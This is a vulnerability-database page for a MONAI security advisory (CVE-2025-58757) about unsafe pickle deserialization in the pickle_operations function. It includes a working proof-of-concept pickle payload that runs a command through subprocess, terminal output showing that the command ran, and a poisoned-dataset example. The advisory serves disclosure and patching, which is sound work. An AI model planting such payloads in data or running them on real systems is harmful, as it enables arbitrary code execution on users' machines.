GHSA-P8CM-MM2V-GWJM

Vulnerability from github – Published: 2025-09-09 21:21 – Updated: 2025-09-26 16:40
VLAI?
Summary
Monai: Unsafe use of Pickle deserialization may lead to RCE
Details

To prevent this report from being deemed inapplicable or out of scope, due to the project's unique nature (for medical applications) and widespread popularity (6k+ stars), it's important to pay attention to some of the project's inherent security issues. (This is because medical professionals may not pay enough attention to security issues when using this project, leading to attacks on services or local machines.)

Summary

The pickle_operations function in monai/data/utils.py automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads() . This function also lacks any security measures.

When verified using the following proof-of-concept, arbitrary code execution can occur.

#Poc
from monai.data.utils import pickle_operations  

import pickle  
import subprocess  

class MaliciousPayload:  
    def __reduce__(self):    
        return (subprocess.call, (['touch', '/tmp/hacker1.txt'],))  

malicious_data = pickle.dumps(MaliciousPayload())

attack_data = {  
    'image': 'normal_image_data',  
    'label_transforms': malicious_data,  
    'metadata_transforms': malicious_data  
}

result = pickle_operations(attack_data, is_encode=False)  

#My /tmp directory contents before running the POC
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log selenium-managersXRcjF supervisor.sock supervisord.pid

Before running the command, there was no hacker1.txt content in my /tmp directory, but after running the command, the command was executed, indicating that the attack was successful.

#Running Poc
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  selenium-managersXRcjF  supervisor.sock  supervisord.pid
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python r1.py 
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp
autodl.sh.log  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid

The above proof-of-concept is merely a validation of the vulnerability. The attacker creates malicious dataset content.

malicious_data = {
  'image': normal_image_tensor,
  'label': normal_label_tensor,
  'preprocessing_transforms': pickle.dumps(MaliciousPayload()), # Malicious payload
  'augmentation_transforms': pickle.dumps(MaliciousPayload()) # Multiple attack points
}

dataset = [malicious_data, ...]

When a user batch-processes data using MONAI's list_data_collate function, the system automatically calls pickle_operations to handle the serialization transformations.

from monai.data import list_data_collate

dataloader = DataLoader(
dataset,
batch_size=4,
collate_fn=list_data_collate # Trigger the vulnerability
)

# Automatically execute malicious code while traversing the data

for batch in dataloader:

# Malicious code is executed in pickle_operations

pass

When a user loads a serialized file from an external, untrusted source, the remote code execution (RCE) is triggered.

Impact

Arbitrary code execution

Repair suggestions

Verify the data source and content before deserializing, or use a safe deserialization method, which should have a similar fix in huggingface's transformer library.

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "monai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58757"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-09T21:21:23Z",
    "nvd_published_at": "2025-09-09T00:15:32Z",
    "severity": "HIGH"
  },
  "details": "\u003eTo prevent this report from being deemed inapplicable or out of scope, due to the project\u0027s unique nature (for medical applications) and widespread popularity (6k+ stars), it\u0027s important to pay attention to some of the project\u0027s inherent security issues. (This is because medical professionals may not pay enough attention to security issues when using this project, leading to attacks on services or local machines.)\n\n### Summary\nThe ```pickle_operations``` function in ```monai/data/utils.py``` automatically handles dictionary key-value pairs ending with a specific suffix and deserializes them using pickle.loads() . This function also lacks any security measures.\n\nWhen verified using the following proof-of-concept, arbitrary code execution can occur.\n```\n#Poc\nfrom monai.data.utils import pickle_operations  \n\nimport pickle  \nimport subprocess  \n  \nclass MaliciousPayload:  \n    def __reduce__(self):    \n        return (subprocess.call, ([\u0027touch\u0027, \u0027/tmp/hacker1.txt\u0027],))  \n  \nmalicious_data = pickle.dumps(MaliciousPayload())\n\nattack_data = {  \n    \u0027image\u0027: \u0027normal_image_data\u0027,  \n    \u0027label_transforms\u0027: malicious_data,  \n    \u0027metadata_transforms\u0027: malicious_data  \n}\n\nresult = pickle_operations(attack_data, is_encode=False)  \n```\n\n```\n#My /tmp directory contents before running the POC\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp\nautodl.sh.log selenium-managersXRcjF supervisor.sock supervisord.pid\n```\nBefore running the command, there was no hacker1.txt content in my /tmp directory, but after running the command, the command was executed, indicating that the attack was successful.\n```\n#Running Poc\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp\nautodl.sh.log  selenium-managersXRcjF  supervisor.sock  supervisord.pid\nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python r1.py \nroot@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /tmp\nautodl.sh.log  hacker1.txt  selenium-managersXRcjF  supervisor.sock  supervisord.pid\n```\nThe above proof-of-concept is merely a validation of the vulnerability.\nThe attacker creates malicious dataset content.\n```\nmalicious_data = {\n  \u0027image\u0027: normal_image_tensor,\n  \u0027label\u0027: normal_label_tensor,\n  \u0027preprocessing_transforms\u0027: pickle.dumps(MaliciousPayload()), # Malicious payload\n  \u0027augmentation_transforms\u0027: pickle.dumps(MaliciousPayload()) # Multiple attack points\n}\n\ndataset = [malicious_data, ...]\n```\nWhen a user batch-processes data using MONAI\u0027s list_data_collate function, the system automatically calls pickle_operations to handle the serialization transformations.\n```\nfrom monai.data import list_data_collate\n\ndataloader = DataLoader(\ndataset,\nbatch_size=4,\ncollate_fn=list_data_collate # Trigger the vulnerability\n)\n\n# Automatically execute malicious code while traversing the data\n\nfor batch in dataloader:\n\n# Malicious code is executed in pickle_operations\n\npass\n```\nWhen a user loads a serialized file from an external, untrusted source, the remote code execution (RCE) is triggered.\n\n### Impact\nArbitrary code execution\n\n### Repair suggestions\nVerify the data source and content before deserializing, or use a safe deserialization method, which should have a similar fix in huggingface\u0027s transformer library.",
  "id": "GHSA-p8cm-mm2v-gwjm",
  "modified": "2025-09-26T16:40:06Z",
  "published": "2025-09-09T21:21:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-p8cm-mm2v-gwjm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58757"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/pull/8566"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Project-MONAI/MONAI/commit/948fbb703adcb87cd04ebd83d20dcd8d73bf6259"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Project-MONAI/MONAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Monai: Unsafe use of Pickle deserialization may lead to RCE"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.